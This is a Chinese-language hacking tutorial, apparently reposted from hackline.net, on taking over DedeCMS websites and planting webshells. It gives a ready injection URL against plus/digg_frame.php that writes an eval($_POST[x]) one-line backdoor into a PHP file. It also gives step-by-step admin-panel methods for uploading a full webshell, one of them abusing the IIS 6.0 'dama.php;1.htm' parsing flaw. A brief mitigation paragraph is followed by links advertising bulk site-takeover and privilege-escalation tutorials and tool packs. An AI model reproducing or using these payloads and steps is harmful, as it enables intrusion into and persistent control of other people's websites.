dedecms网站入侵拿webshell方法
文章作者:udb311
转载请注明:http://www.hackline.net/
1、注入漏洞
存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
注入成功,产生了注入文件。
http://localhost:802/data/mysql_error_trace.php
一句话木马连接上传大马即可!
注入漏洞详解见
http://www.hackline.net/a/news/ldfb/2009/0830/323.html
2、后台拿webshell
第一种方法,利用文件管理直接创建php大马```
后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。
如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。
后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```
如果没有安装插件,并删除了插件目录就无法使用此方法。
第二种方法:利用标签源码管理
后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。
第三种方法、利用模板修改。
此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。
后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。
目前本人对此想出以下解决办法
注入漏洞官方已有补丁,6月6号的程序更新至最新补丁即可。
标签源码在线修改,可以修改后台源文件。删除标签在线管理功能,或者改templets_tagsource.php文件名。
模板在线修改,可以通过IIS限制脚本执行。删除或者重命名templets_main.php文件```
相关推荐
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
通过利用良精南方系统的漏洞,实现进入网站后台,并上传 。马,得到一个webshell的教程,讲述详细,一看就会。利用该方法,可以配合工具实现批量拿站。
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站的webshell webshell的作用是方便攻击者,webshell是拥有...拿webshell也是getshell的另一种叫法。
目前比较流行的拿webshell的方法,适合刚入行的菜鸟学习
NC拿webshell技巧.
最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看
WEBSHELL提权方法总结,大家可以看一下,不明白QQ我
抓包拿webshell教材 懂得人都知道
修改数据包拿 WebShell
利用抓包拿WEBSHELL,网络收集来的,只是教程,不含软件,仅供学习用。
IIS写权限拿WEBSHELL全套
新思路 抓包拿Webshell教程 通过监听端口突破上传
MySQL导出一句话拿WebShell的方法
怎么拿webshell,这是简单的一些整理好的语句!
NC上传拿WEBSHELL教程,学习有关网络攻击技术。
数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL
DB权限拿webshell_提权(语音)
拿webshell的所有工具,里面有啊D,ASP大马,ASP小马,名小子,抓包工具,旁注工具,nb,IIS写权限漏洞,ACCESS查看器等等!
网站拿webshell_经典全集.doc